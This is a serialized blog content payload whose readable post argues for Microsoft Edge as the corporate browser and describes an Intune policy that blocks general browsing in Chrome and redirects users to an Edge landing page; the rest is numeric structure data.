Attack Intune Privilege | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"type":2241,"id":2255},"/posts/2026-03-20-stryker-attack-intune-privilege",{"title":24198,"description":24204},"posts/2026-03-20-stryker-attack-intune-privilege",[3425,24503,5300],"Privileged Access","KiTB0W_U_7IfW2TDV3xVVIBiZyPA692HMsvP-eqGvEA",{"id":24506,"title":24507,"author":24508,"body":24509,"cta":2166,"description":24513,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":24700,"moment":24702,"navigation":2181,"path":24731,"seo":24732,"stem":24733,"tags":2166,"webcast":2168,"__hash__":24734},"content_en/posts/2026-03-21-microsoft-edge-corporate-browser.md","Why Edge Should Be Your Only Corporate Browser",[2331],{"type":9,"value":24510,"toc":24692},[24511,24514,24517,24519,24525,24529,24531,24534,24538,24540,24543,24557,24561,24563,24569,24575,24578,24621,24629,24633,24635,24643,24654,24658,24660,24663,24689],[12,24512,24513],{},"In today's enterprise environments, choosing the right browser is more than a matter of preference. It's a strategic decision that impacts security, manageability, and user productivity. While Google Chrome has long been a popular choice, Microsoft Edge has evolved into an enterprise-ready browser that offers compelling advantages, especially when using Microsoft 365 and managed through Microsoft Intune.",[41,24515,2176],{"id":24516},"security",[12,24518,31],{},[12,24520,24521,24522,24524],{},"Using a managed Microsoft Edge browser ensures that security features are consistently enforced across all endpoints. With native integration into Microsoft Defender SmartScreen, Edge provides protection against phishing, malware, and other threats. When deployed via Intune, policies can tightly control behavior, block risky extensions, and enforce safe browsing practices. glueckkanja's ",[2672,24523,24341],{"href":24340}," offers up-to-date Edge policies aligned with Microsoft's Security baselines.",[41,24526,24528],{"id":24527},"synchronization-with-entra-id-account","Synchronization with Entra ID Account",[12,24530,31],{},[12,24532,24533],{},"Edge supports secure synchronization of user data, such as favourites, passwords, and settings, across devices via Entra ID accounts. This is especially beneficial in hybrid work scenarios, allowing users to switch between corporate laptops, virtual desktops, and mobile devices without losing context or productivity.",[41,24535,24537],{"id":24536},"avoiding-complexity-offering-multiple-browsers-adds-overhead","Avoiding Complexity: Offering Multiple Browsers Adds Overhead",[12,24539,31],{},[12,24541,24542],{},"Supporting alternative browsers like Google Chrome in a corporate environment often requires additional infrastructure and effort:",[1254,24544,24545,24551],{"style":23466},[1257,24546,24547,24550],{},[251,24548,24549],{},"Backup and Sync Strategies:"," Other browsers often require third-party accounts (e.g. a Google Account) to enable synchronization.",[1257,24552,24553,24556],{},[251,24554,24555],{},"Policy Maintenance:"," Each browser requires its own set of security and configuration policies. Maintaining these across multiple platforms demands ongoing effort, increases the risk of misconfiguration, and complicates audits.",[41,24558,24560],{"id":24559},"policy-driven-chrome-redirection-via-intune","Policy-Driven Chrome Redirection via Intune",[12,24562,31],{},[12,24564,24565,24566,24568],{},"To guide users from Chrome to Edge, organizations can implement a redirection policy using Microsoft Intune — ready-to-use and implemented within minutes via glueckkanja's ",[2672,24567,24341],{"href":24340},". Users are greeted with a landing page that highlights Microsoft Edge as the default corporate browser, along with a one-click option to launch it directly.",[12,24570,24571],{},[2642,24572],{"alt":24573,"src":24574},"Microsoft Edge as the default corporate browser","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsoft-edge-default-browser.png",[12,24576,24577],{},"The configuration policy demonstrates how Chrome can be restricted and redirected:",[1254,24579,24580,24594,24603,24609,24615],{"style":23466},[1257,24581,24582,24585,24586,24589,24590,24593],{},[251,24583,24584],{},"URL Allowlist:"," Only specific URLs like the landing page ",[63,24587,24588],{},"https://edge.glueckkanja.com/"," and the moniker ",[63,24591,24592],{},"microsoft-edge:*"," are permitted.",[1257,24595,24596,24599,24600,24602],{},[251,24597,24598],{},"URL Blocklist:"," All other URLs are blocked (",[63,24601,1291],{},"), effectively disabling general browsing in Chrome.",[1257,24604,24605,24608],{},[251,24606,24607],{},"Homepage and New Tab Page:"," Both are set to the landing page that encourages users to open Microsoft Edge.",[1257,24610,24611,24614],{},[251,24612,24613],{},"Protocol Handling:"," Chrome is configured to auto-launch Edge when clicking URLs on the landing page.",[1257,24616,24617,24620],{},[251,24618,24619],{},"Extension Control:"," Additional settings restrict extension installation.",[12,24622,24623,24624],{},"Example policy as download: ",[2672,24625,24628],{"href":24626,"rel":24627},"https://github.com/glueckkanja/edge-redirection-landingpage/tree/main/docs/policies",[2676],"Win - Default - Google Chrome - Redirect to Edge - v2.0.json",[41,24630,24632],{"id":24631},"landing-page-via-github-pages","Landing Page via GitHub Pages",[12,24634,31],{},[12,24636,24637,24638],{},"The website is powered by GitHub Pages. Feel free to adjust it to your needs and contribute to the GitHub project: ",[2672,24639,24642],{"href":24640,"rel":24641},"https://github.com/glueckkanja/edge-redirection-landingpage",[2676],"edge-redirection-landingpage",[12,24644,24645],{},[2672,24646,24651],{"role":5993,"className":24647,"dataText":24648,"href":24649,"target":4914,"rel":24650,"type":6003},[5995,5996,5999,6000],"See the landing page in action","https://edge.glueckkanja.com",[24327],[102,24652,24648],{"className":24653},[6007],[41,24655,24657],{"id":24656},"key-takeaways","Key Takeaways",[12,24659,31],{},[12,24661,24662],{},"Microsoft Edge offers a secure, manageable browsing experience with deep integration into Microsoft 365, making it the logical choice as the default corporate browser. The key advantages:",[1254,24664,24665,24668,24671,24674,24677,24680,24683,24686],{"style":23466},[1257,24666,24667],{},"Seamless Entra ID integration (SSO)",[1257,24669,24670],{},"Cloud-based sync and backup via Microsoft 365 account across multiple platforms",[1257,24672,24673],{},"Built-in security ecosystem (Microsoft Defender SmartScreen and Microsoft Endpoint DLP)",[1257,24675,24676],{},"Intune App Protection Policy support",[1257,24678,24679],{},"Browser management via Microsoft 365 admin center and Intune",[1257,24681,24682],{},"Internet Explorer mode for legacy compatibility",[1257,24684,24685],{},"Corporate branding",[1257,24687,24688],{},"Copilot integration",[12,24690,24691],{},"Standardizing on Edge reduces complexity, strengthens security, and simplifies support. Extending the redirection approach to other common browsers is a feasible next step as well.",{"title":65,"searchDepth":111,"depth":111,"links":24693},[24694,24695,24696,24697,24698,24699],{"id":24516,"depth":111,"text":2176},{"id":24527,"depth":111,"text":24528},{"id":24536,"depth":111,"text":24537},{"id":24559,"depth":111,"text":24560},{"id":24631,"depth":111,"text":24632},{"id":24656,"depth":111,"text":24657},{"lang":2171,"seoTitle":24701,"titleClass":2173,"date":24702,"blogtitlepic":24703,"socialimg":24704,"customExcerpt":24705,"keywords":24706,"hreflang":24707,"published":2181,"asideNav":24714},"Microsoft Edge as the Secured Corporate Browser: Security, Sync, and Chrome Redirection via Intune","2026-03-21","head-microsoft-edge-default-browser.jpg","/blog/heads/head-microsoft-edge-default-browser.jpg","The browser nobody satisfies chose became the one everybody manages. Most companies never made a deliberate decision for Chrome; it just showed up, brought its own sync logic, its own account layer, its own policy surface. Meanwhile, Microsoft Edge matured into a browser that plugs directly into the infrastructure enterprises already run: Entra ID, Intune, Defender. This post shows how to make that switch official, redirect Chrome to a landing page via Intune policy, and retire the complexity that comes with maintaining two browsers in parallel.","Microsoft Edge, corporate browser, Microsoft Intune, Entra ID, Chrome redirection, Managed Intune, browser policy, Microsoft Defender SmartScreen, enterprise browser, browser management, URL blocklist, URL allowlist",[24708,24710,24712],{"lang":2260,"href":24709},"/de/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":2171,"href":24711},"/en/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":2263,"href":24713},"/es/posts/2026-03-21-microsoft-edge-corporate-browser",{"menuItems":24715},[24716,24718,24721,24724,24727,24729],{"href":24717,"text":2176},"#security",{"href":24719,"text":24720},"#synchronization-with-entra-id-account","Synchronization with Entra ID",{"href":24722,"text":24723},"#avoiding-complexity-offering-multiple-browsers-adds-overhead","Avoiding Complexity",{"href":24725,"text":24726},"#policy-driven-chrome-redirection-via-intune","Chrome Redirection via Intune",{"href":24728,"text":24632},"#landing-page-via-github-pages",{"href":24730,"text":24657},"#key-takeaways","/posts/2026-03-21-microsoft-edge-corporate-browser",{"title":24507,"description":24513},"posts/2026-03-21-microsoft-edge-corporate-browser","AsMZExVFaHmpVg3-wvTocO819mSe8A4QZIdrFls8YIw",{"id":4,"title":5,"author":24736,"body":24737,"cta":2166,"description":14,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":26206,"moment":2174,"navigation":2181,"path":2265,"seo":26237,"stem":2267,"tags":26238,"webcast":2168,"__hash__":2274},[7],{"type":9,"value":24738,"toc":26170},[24739,24741,24743,24745,24747,24749,24751,24753,24755,24757,24759,24761,24763,24770,24772,24774,24781,24783,24785,24787,24789,24803,24805,24812,24814,24821,24825,24827,24829,24831,24838,24846,24848,24850,24852,24854,24856,24863,24865,24867,24874,24876,24878,24880,24882,24884,24886,24893,24895,24897,24901,24903,24967,24969,24995,24997,24999,25001,25005,25007,25009,25011,25067,25069,25071,25077,25081,25123,25129,25133,25135,25137,25183,25185,25187,25191,25193,25195,25197,25201,25215,25337,25339,25346,25352,25354,25361,25369,25377,25379,25381,25383,25393,25407,25545,25547,25554,25556,25558,25560,25562,25564,25566,25620,25622,25632,25682,25684,25686,25688,25690,25692,25696,25734,25736,25743,25745,25747,25749,25751,25755,25763,25797,25805,25839,25845,25853,25855,25857,25859,25861,25865,25867,25874,25876,25883,25891,25893,25895,25897,25899,25905,25907,25909,25919,25926,25934,25946,25948,25950,25952,25959,25961,25968,25976,25978,25980,25982,25989,25999,26003,26005,26007,26014,26018,26022,26024,26026,26033,26035,26037,26039,26046,26048,26050,26052,26059,26061,26063,26070,26072,26074,26081,26083,26085,26092,26104,26108,26110,26112,26114,26118,26132,26134,26142,26144,26146,26148,26150,26152,26154,26156,26168],[12,24740,14],{},[12,24742,17],{},[12,24744,20],{},[22,24746],{},[25,24748,28],{"id":27},[12,24750,31],{},[12,24752,34],{},[12,24754,37],{},[22,24756],{},[41,24758,44],{"id":43},[12,24760,47],{},[12,24762,50],{},[52,24764,24765],{"style":54},[56,24766,24768],{"className":24767,"code":60,"language":61},[59],[63,24769,60],{"__ignoreMap":65},[12,24771,68],{},[12,24773,71],{},[52,24775,24776],{"style":54},[56,24777,24779],{"className":24778,"code":77,"language":61},[59],[63,24780,77],{"__ignoreMap":65},[12,24782,82],{},[41,24784,86],{"id":85},[12,24786,47],{},[12,24788,91],{},[52,24790,24791],{"style":54},[56,24792,24793],{"className":96,"code":97,"language":98,"meta":65,"style":65},[63,24794,24795,24799],{"__ignoreMap":65},[102,24796,24797],{"class":104,"line":105},[102,24798,108],{},[102,24800,24801],{"class":104,"line":111},[102,24802,114],{},[12,24804,117],{},[52,24806,24807],{"style":54},[56,24808,24810],{"className":24809,"code":123,"language":61},[59],[63,24811,123],{"__ignoreMap":65},[12,24813,128],{},[52,24815,24816],{"style":54},[56,24817,24819],{"className":24818,"code":134,"language":61},[59],[63,24820,134],{"__ignoreMap":65},[12,24822,139,24823,143],{},[63,24824,142],{},[41,24826,147],{"id":146},[12,24828,47],{},[12,24830,152],{},[52,24832,24833],{"style":54},[56,24834,24836],{"className":24835,"code":158,"language":61},[59],[63,24837,158],{"__ignoreMap":65},[12,24839,163,24840,167,24842,171,24844,175],{},[63,24841,166],{},[63,24843,170],{},[63,24845,174],{},[41,24847,179],{"id":178},[12,24849,47],{},[12,24851,184],{},[186,24853,189],{"id":188},[12,24855,192],{},[52,24857,24858],{"style":54},[56,24859,24861],{"className":24860,"code":198,"language":61},[59],[63,24862,198],{"__ignoreMap":65},[186,24864,204],{"id":203},[12,24866,192],{},[52,24868,24869],{"style":54},[56,24870,24872],{"className":24871,"code":212,"language":61},[59],[63,24873,212],{"__ignoreMap":65},[186,24875,218],{"id":217},[12,24877,192],{},[12,24879,223],{},[186,24881,227],{"id":226},[12,24883,192],{},[12,24885,232],{},[52,24887,24888],{"style":54},[56,24889,24891],{"className":24890,"code":238,"language":61},[59],[63,24892,238],{"__ignoreMap":65},[186,24894,244],{"id":243},[12,24896,192],{},[12,24898,249,24899,254],{},[251,24900,253],{},[12,24902,257],{},[52,24904,24905],{"style":54},[56,24906,24907],{"className":262,"code":263,"language":264,"meta":65,"style":65},[63,24908,24909,24929,24947,24959],{"__ignoreMap":65},[102,24910,24911,24913,24915,24917,24919,24921,24923,24925,24927],{"class":104,"line":105},[102,24912,272],{"class":271},[102,24914,276],{"class":275},[102,24916,279],{"class":275},[102,24918,282],{"class":275},[102,24920,286],{"class":285},[102,24922,290],{"class":289},[102,24924,294],{"class":293},[102,24926,297],{"class":285},[102,24928,300],{"class":289},[102,24930,24931,24933,24935,24937,24939,24941,24943,24945],{"class":104,"line":111},[102,24932,305],{"class":271},[102,24934,308],{"class":275},[102,24936,311],{"class":275},[102,24938,314],{"class":275},[102,24940,317],{"class":275},[102,24942,320],{"class":275},[102,24944,323],{"class":289},[102,24946,326],{"class":275},[102,24948,24949,24951,24953,24955,24957],{"class":104,"line":329},[102,24950,332],{"class":275},[102,24952,335],{"class":289},[102,24954,338],{"class":275},[102,24956,341],{"class":289},[102,24958,326],{"class":275},[102,24960,24961,24963,24965],{"class":104,"line":346},[102,24962,349],{"class":275},[102,24964,352],{"class":289},[102,24966,355],{"class":289},[12,24968,358],{},[52,24970,24971],{"style":54},[56,24972,24973],{"className":262,"code":363,"language":264,"meta":65,"style":65},[63,24974,24975,24989],{"__ignoreMap":65},[102,24976,24977,24979,24981,24983,24985,24987],{"class":104,"line":105},[102,24978,370],{"class":271},[102,24980,373],{"class":275},[102,24982,286],{"class":285},[102,24984,290],{"class":289},[102,24986,294],{"class":293},[102,24988,382],{"class":285},[102,24990,24991,24993],{"class":104,"line":111},[102,24992,370],{"class":271},[102,24994,300],{"class":289},[22,24996],{},[25,24998,394],{"id":393},[12,25000,31],{},[12,25002,399,25003,403],{},[63,25004,402],{},[12,25006,406],{},[41,25008,410],{"id":409},[12,25010,47],{},[52,25012,25013],{"style":415},[417,25014,420,25015,420,25023],{"style":419},[422,25016,424,25017,420],{},[426,25018,428,25019,428,25021,424],{},[430,25020,433],{"style":432},[430,25022,436],{"style":432},[438,25024,424,25025,424,25031,424,25037,424,25043,424,25051,424,25059,420],{},[426,25026,428,25027,428,25029,424],{},[443,25028,446],{"style":445},[443,25030,449],{"style":445},[426,25032,428,25033,428,25035,424],{},[443,25034,455],{"style":454},[443,25036,458],{"style":454},[426,25038,428,25039,428,25041,424],{},[443,25040,463],{"style":445},[443,25042,466],{"style":445},[426,25044,428,25045,428,25047,424],{},[443,25046,471],{"style":454},[443,25048,25049],{"style":454},[63,25050,476],{},[426,25052,428,25053,428,25055,424],{},[443,25054,481],{"style":445},[443,25056,25057],{"style":445},[63,25058,486],{},[426,25060,428,25061,428,25063,424],{},[443,25062,491],{"style":454},[443,25064,25065],{"style":454},[63,25066,496],{},[41,25068,500],{"id":499},[12,25070,47],{},[12,25072,505,25073,509,25075,513],{},[63,25074,508],{},[63,25076,512],{},[12,25078,516,25079,520],{},[63,25080,519],{},[52,25082,25083],{"style":54},[524,25084,25085,25087,25089,25091,540,25093,545,25095,548,25097,552,25099,25107],{},[102,25086,529],{"style":528},[531,25088],{},[102,25090,535],{"style":528},[102,25092,539],{"style":538},[102,25094,544],{"style":543},[102,25096,539],{"style":538},[102,25098,551],{"style":538},[12,25100,25101,558,25103,545,25105,566],{},[102,25102,557],{"style":528},[102,25104,561],{"style":543},[102,25106,565],{"style":564},[12,25108,25109,25111,575,25113,578,25115,582,25117,586,25119,590,25121,594],{},[102,25110,571],{"style":528},[102,25112,574],{"style":528},[102,25114,63],{"style":538},[102,25116,581],{"style":538},[102,25118,585],{"style":564},[102,25120,589],{"style":564},[102,25122,593],{"style":538},[12,25124,597,25125,601,25127,605],{},[63,25126,600],{},[63,25128,604],{},[12,25130,608,25131,612],{},[251,25132,611],{},[41,25134,616],{"id":615},[12,25136,47],{},[52,25138,25139],{"style":54},[56,25140,25141],{"className":623,"code":624,"language":625,"meta":65,"style":65},[63,25142,25143,25147,25151,25155,25159,25163,25167,25171,25175,25179],{"__ignoreMap":65},[102,25144,25145],{"class":104,"line":105},[102,25146,632],{},[102,25148,25149],{"class":104,"line":111},[102,25150,637],{},[102,25152,25153],{"class":104,"line":329},[102,25154,642],{},[102,25156,25157],{"class":104,"line":346},[102,25158,647],{},[102,25160,25161],{"class":104,"line":650},[102,25162,653],{},[102,25164,25165],{"class":104,"line":656},[102,25166,659],{},[102,25168,25169],{"class":104,"line":662},[102,25170,665],{},[102,25172,25173],{"class":104,"line":668},[102,25174,671],{},[102,25176,25177],{"class":104,"line":674},[102,25178,677],{},[102,25180,25181],{"class":104,"line":680},[102,25182,683],{},[41,25184,687],{"id":686},[12,25186,47],{},[12,25188,692,25189,696],{},[63,25190,695],{},[22,25192],{},[186,25194,702],{"id":701},[12,25196,192],{},[12,25198,707,25199,711],{},[63,25200,710],{},[12,25202,714,25203,718,25205,722,25207,726,25209,718,25211,733,25213,737],{},[63,25204,717],{},[63,25206,721],{},[63,25208,725],{},[63,25210,729],{},[63,25212,732],{},[63,25214,736],{},[52,25216,25217],{"style":54},[524,25218,25219,25221,25223,25225,540,25227,545,25229,757,25231,760,25233,763,25235,766,25237,770,25239],{},[102,25220,744],{"style":528},[531,25222],{},[102,25224,749],{"style":528},[102,25226,539],{"style":538},[102,25228,717],{"style":543},[102,25230,756],{"style":538},[102,25232,756],{"style":538},[102,25234,539],{"style":538},[102,25236,756],{"style":538},[102,25238,769],{"style":538},[12,25240,773,25241,545,25243,780,25245,25249,789,25251,792,25253,25255,25257,801,25259,805,25261,809,25263,813,25265,816,25267,578,25269,821,25271,825,25273,829,25275,832,25277,836,25279,840,25281,578,25283,846,25285,850,25287,25289,25291,859,25293,578,25295,864,25297,867,25299,870,25301,876,25305,880,25307,886,25311,890,25313,893,25315,899,25319,902,25321,905,25323,909,25325,913,25327,916,25329,25331,25333,925,25335,594],{},[102,25242,776],{"style":543},[102,25244,779],{"style":564},[102,25246,783,25247],{"style":528},[531,25248],{},[102,25250,788],{"style":543},[102,25252,779],{"style":564},[102,25254,795],{"style":528},[531,25256],{},[102,25258,800],{"style":543},[102,25260,804],{"style":564},[102,25262,808],{"style":564},[102,25264,812],{"style":528},[102,25266,808],{"style":564},[102,25268,769],{"style":538},[102,25270,756],{"style":538},[102,25272,824],{"style":564},[102,25274,828],{"style":538},[102,25276,756],{"style":538},[102,25278,835],{"style":538},[102,25280,839],{"style":564},[102,25282,843],{"style":538},[102,25284,756],{"style":538},[102,25286,849],{"style":564},[102,25288,853],{"style":528},[531,25290],{},[102,25292,858],{"style":528},[102,25294,843],{"style":538},[102,25296,756],{"style":538},[102,25298,843],{"style":538},[102,25300,551],{"style":538},[102,25302,873,25303],{},[102,25304,839],{"style":564},[102,25306,879],{"style":564},[102,25308,873,25309],{},[102,25310,885],{"style":564},[102,25312,889],{"style":564},[102,25314,843],{"style":538},[102,25316,25317],{},[102,25318,898],{"style":564},[102,25320,839],{"style":564},[102,25322,879],{"style":564},[102,25324,908],{"style":528},[102,25326,912],{"style":538},[102,25328,804],{"style":564},[102,25330,919],{"style":528},[531,25332],{},[102,25334,924],{"style":543},[102,25336,593],{"style":538},[12,25338,930],{},[52,25340,25341],{"style":54},[56,25342,25344],{"className":25343,"code":936,"language":61},[59],[63,25345,936],{"__ignoreMap":65},[12,25347,941,25348,945,25350,949],{},[63,25349,944],{},[63,25351,948],{},[12,25353,952],{},[52,25355,25356],{"style":54},[56,25357,25359],{"className":25358,"code":958,"language":61},[59],[63,25360,958],{"__ignoreMap":65},[12,25362,399,25363,966,25365,970,25367,974],{},[63,25364,965],{},[63,25366,969],{},[63,25368,973],{},[12,25370,977,25371,980,25373,983,25375,987],{},[63,25372,729],{},[63,25374,736],{},[63,25376,986],{},[22,25378],{},[186,25380,993],{"id":992},[12,25382,192],{},[12,25384,998,25385,1002,25387,718,25389,1009,25391,1013],{},[63,25386,1001],{},[63,25388,1005],{},[63,25390,1008],{},[63,25392,1012],{},[12,25394,1016,25395,873,25397,805,25399,873,25401,805,25403,873,25405,1035],{},[63,25396,1019],{},[63,25398,1022],{},[63,25400,1025],{},[63,25402,1028],{},[63,25404,1031],{},[63,25406,1034],{},[52,25408,25409],{"style":54},[524,25410,25411,25413,25415,1049,25417,578,25419,1055,25421,540,25423,1061,25425,1065,25427,420,25429,540,25431,1074,25433,1078,25435,1081,25437,420,25439,540,25441,1074,25443,1078,25445,1081,25447,420,25449,420,25451,540,25453,1061,25455,540,25457,1074,25459,1078,25461,1114,25463,420,25465,540,25467,1061,25469,540,25471,1074,25473,1078,25475,1114,25477,420,25479,540,25481,1061,25483,540,25485,1146,25487,1078,25489,1114,25491,420,25493,540,25495,1061,25497,540,25499,1165,25501,1078,25503,1114,25505,420,25507,540,25509,1061,25511,540,25513,1074,25515,1078,25517,1114,25519,420,25521,540,25523,1061,25525,540,25527,1074,25529,1078,25531,1114,25533,1208,25535,859,25537,578,25539,1217,25541,1220,25543,1224],{},[102,25412,1042],{"style":528},[102,25414,1045],{"style":528},[102,25416,1048],{"style":538},[102,25418,1052],{"style":538},[102,25420,756],{"style":538},[102,25422,1058],{"style":538},[102,25424,1019],{"style":564},[102,25426,1064],{"style":538},[102,25428,1068],{"style":528},[102,25430,1058],{"style":538},[102,25432,1073],{"style":564},[102,25434,1077],{"style":564},[102,25436,1064],{"style":538},[102,25438,1084],{"style":528},[102,25440,1058],{"style":538},[102,25442,1089],{"style":564},[102,25444,1092],{"style":564},[102,25446,1064],{"style":538},[102,25448,1097],{"style":528},[102,25450,1100],{"style":528},[102,25452,1058],{"style":538},[102,25454,1025],{"style":564},[102,25456,1058],{"style":538},[102,25458,1031],{"style":564},[102,25460,1111],{"style":564},[102,25462,1064],{"style":538},[102,25464,1117],{"style":528},[102,25466,1058],{"style":538},[102,25468,1122],{"style":564},[102,25470,1058],{"style":538},[102,25472,1127],{"style":564},[102,25474,1130],{"style":564},[102,25476,1064],{"style":538},[102,25478,1135],{"style":528},[102,25480,1058],{"style":538},[102,25482,1140],{"style":564},[102,25484,1058],{"style":538},[102,25486,1145],{"style":564},[102,25488,1149],{"style":564},[102,25490,1064],{"style":538},[102,25492,1154],{"style":528},[102,25494,1058],{"style":538},[102,25496,1159],{"style":564},[102,25498,1058],{"style":538},[102,25500,1164],{"style":564},[102,25502,1168],{"style":564},[102,25504,1064],{"style":538},[102,25506,1173],{"style":528},[102,25508,1058],{"style":538},[102,25510,1178],{"style":564},[102,25512,1058],{"style":538},[102,25514,1183],{"style":564},[102,25516,1186],{"style":564},[102,25518,1064],{"style":538},[102,25520,1191],{"style":528},[102,25522,1058],{"style":538},[102,25524,1028],{"style":564},[102,25526,1058],{"style":538},[102,25528,1034],{"style":564},[102,25530,1202],{"style":564},[102,25532,1064],{"style":538},[102,25534,1207],{"style":528},[102,25536,1211],{"style":528},[102,25538,1214],{"style":538},[102,25540,756],{"style":538},[102,25542,581],{"style":538},[102,25544,1223],{"style":564},[12,25546,1227],{},[52,25548,25549],{"style":54},[56,25550,25552],{"className":25551,"code":1233,"language":61},[59],[63,25553,1233],{"__ignoreMap":65},[12,25555,1238],{},[12,25557,1241],{},[22,25559],{},[186,25561,1247],{"id":1246},[12,25563,192],{},[12,25565,1252],{},[1254,25567,25568,25602],{},[1257,25569,25570,1262,25572,805,25574,805,25576,805,25578,805,25580,805,25582,805,25584,805,25586,805,25588,805,25590,805,25592,805,25594,805,25596,805,25598,805,25600],{},[63,25571,1261],{},[63,25573,1265],{},[63,25575,1268],{},[63,25577,1271],{},[63,25579,1274],{},[63,25581,1277],{},[63,25583,1280],{},[63,25585,1283],{},[63,25587,545],{},[63,25589,1288],{},[63,25591,1291],{},[63,25593,1294],{},[63,25595,1297],{},[63,25597,873],{},[63,25599,1013],{},[63,25601,1304],{},[1257,25603,25604,1061,25606,805,25608,805,25610,805,25612,805,25614,805,25616,805,25618,1331],{},[63,25605,1309],{},[63,25607,1312],{},[63,25609,1315],{},[63,25611,1318],{},[63,25613,1321],{},[63,25615,1324],{},[63,25617,1327],{},[63,25619,1330],{},[12,25621,1334],{},[12,25623,1337,25624,1341,25626,1345,25628,1349,25630,1353],{},[63,25625,1340],{},[63,25627,1344],{},[63,25629,1348],{},[63,25631,1352],{},[52,25633,25634],{"style":54},[524,25635,25636,1361,25638,1364,25640,1367,25642,1370,25644,1374,25646,420,25648,1380,25650,1383,25652,424,25654,1389,25656,1393,25658,1396,25660,424,25662,1402,25664,1406,25666,1410,25668,1413,25670,1417,25672,1420,25674,578,25676,1426,25678,1429,25680,1432],{},[102,25637,1360],{"style":528},[102,25639,808],{"style":564},[102,25641,828],{"style":538},[102,25643,1052],{"style":538},[102,25645,1373],{"style":543},[102,25647,1377],{"style":528},[102,25649,835],{"style":538},[102,25651,808],{"style":564},[102,25653,1386],{"style":528},[102,25655,1373],{"style":543},[102,25657,1392],{"style":538},[102,25659,585],{"style":564},[102,25661,1399],{"style":528},[102,25663,912],{"style":538},[102,25665,1405],{"style":564},[102,25667,1409],{"style":543},[102,25669,843],{"style":538},[102,25671,1416],{"style":528},[102,25673,824],{"style":564},[102,25675,1423],{"style":538},[102,25677,756],{"style":538},[102,25679,839],{"style":564},[102,25681,912],{"style":538},[12,25683,1435],{},[22,25685],{},[186,25687,1441],{"id":1440},[12,25689,192],{},[12,25691,1446],{},[12,25693,1449,25694,1453],{},[63,25695,1452],{},[52,25697,25698],{"style":54},[524,25699,25700,25702,25704,540,25706,545,25708,757,25710,1472,25712,1476,25714,420,25716,420,25718,1486,25720,1489,25722,1492,25724,1495,25726,1114,25728,1502,25730,1505,25732,1508],{},[102,25701,1460],{"style":528},[102,25703,1463],{"style":528},[102,25705,551],{"style":538},[102,25707,1452],{"style":543},[102,25709,843],{"style":538},[102,25711,551],{"style":538},[102,25713,1475],{"style":564},[102,25715,1479],{"style":528},[102,25717,1482],{"style":528},[102,25719,1485],{"style":538},[102,25721,808],{"style":564},[102,25723,839],{"style":564},[102,25725,551],{"style":538},[102,25727,1498],{"style":564},[102,25729,1501],{"style":528},[102,25731,839],{"style":564},[102,25733,593],{"style":538},[12,25735,1511],{},[52,25737,25738],{"style":54},[56,25739,25741],{"className":25740,"code":1517,"language":61},[59],[63,25742,1517],{"__ignoreMap":65},[12,25744,1522],{},[22,25746],{},[186,25748,1528],{"id":1527},[12,25750,192],{},[12,25752,1533,25753,1537],{},[251,25754,1536],{},[12,25756,25757,1543,25759,718,25761,1550],{},[251,25758,1542],{},[63,25760,1546],{},[63,25762,1549],{},[52,25764,25765],{"style":54},[524,25766,25767,1558,25769,1364,25771,1564,25773,578,25775,1569,25777,1572,25779,578,25781,1577,25783,1580,25785,578,25787,1585,25789,1588,25791,1592,25793,1595,25795,1598],{},[102,25768,1557],{"style":528},[102,25770,1561],{"style":564},[102,25772,828],{"style":538},[102,25774,1214],{"style":538},[102,25776,756],{"style":538},[102,25778,581],{"style":538},[102,25780,1214],{"style":538},[102,25782,756],{"style":538},[102,25784,1223],{"style":564},[102,25786,1214],{"style":538},[102,25788,756],{"style":538},[102,25790,551],{"style":538},[102,25792,1591],{"style":528},[102,25794,839],{"style":564},[102,25796,912],{"style":538},[12,25798,25799,805,25801,718,25803,1550],{},[251,25800,1603],{},[63,25802,1606],{},[63,25804,1609],{},[52,25806,25807],{"style":54},[524,25808,25809,1558,25811,1364,25813,1564,25815,578,25817,1626,25819,1572,25821,578,25823,1633,25825,1580,25827,578,25829,1585,25831,1588,25833,1592,25835,1595,25837,1598],{},[102,25810,1616],{"style":528},[102,25812,1619],{"style":564},[102,25814,828],{"style":538},[102,25816,1214],{"style":538},[102,25818,756],{"style":538},[102,25820,581],{"style":538},[102,25822,1214],{"style":538},[102,25824,756],{"style":538},[102,25826,1223],{"style":564},[102,25828,1214],{"style":538},[102,25830,756],{"style":538},[102,25832,551],{"style":538},[102,25834,1644],{"style":528},[102,25836,839],{"style":564},[102,25838,912],{"style":538},[12,25840,1651,25841,1654,25843,1657],{},[63,25842,1561],{},[63,25844,1619],{},[12,25846,1660,25847,1664,25849,1668,25851,1672],{},[251,25848,1663],{},[63,25850,1667],{},[63,25852,1671],{},[12,25854,1675],{},[22,25856],{},[186,25858,1681],{"id":1680},[12,25860,192],{},[12,25862,1686,25863,1690],{},[251,25864,1689],{},[12,25866,1693],{},[52,25868,25869],{"style":54},[56,25870,25872],{"className":25871,"code":1699,"language":61},[59],[63,25873,1699],{"__ignoreMap":65},[12,25875,1704],{},[52,25877,25878],{"style":54},[56,25879,25881],{"className":25880,"code":1710,"language":61},[59],[63,25882,1710],{"__ignoreMap":65},[12,25884,1715,25885,1719,25887,1723,25889,1726],{},[63,25886,1718],{},[63,25888,1722],{},[63,25890,1718],{},[12,25892,1729],{},[22,25894],{},[41,25896,1735],{"id":1734},[12,25898,47],{},[12,25900,1740,25901,718,25903,1747],{},[63,25902,1743],{},[63,25904,1746],{},[186,25906,1751],{"id":1750},[12,25908,192],{},[12,25910,1756,25911,1760,25913,1764,25915,1768,25917,1772],{},[63,25912,1759],{},[63,25914,1763],{},[63,25916,1767],{},[63,25918,1771],{},[52,25920,25921],{"style":54},[56,25922,25924],{"className":25923,"code":1778,"language":61},[59],[63,25925,1778],{"__ignoreMap":65},[12,25927,1783,25928,1787,25930,1790,25932,1794],{},[63,25929,1786],{},[63,25931,1013],{},[63,25933,1793],{},[12,25935,1797,25936,805,25938,805,25940,805,25942,1810,25944,1814],{},[63,25937,1800],{},[63,25939,1803],{},[63,25941,1806],{},[63,25943,1809],{},[63,25945,1813],{},[186,25947,1818],{"id":1817},[12,25949,192],{},[12,25951,1823],{},[52,25953,25954],{"style":54},[56,25955,25957],{"className":25956,"code":1829,"language":61},[59],[63,25958,1829],{"__ignoreMap":65},[12,25960,1834],{},[52,25962,25963],{"style":54},[56,25964,25966],{"className":25965,"code":1840,"language":61},[59],[63,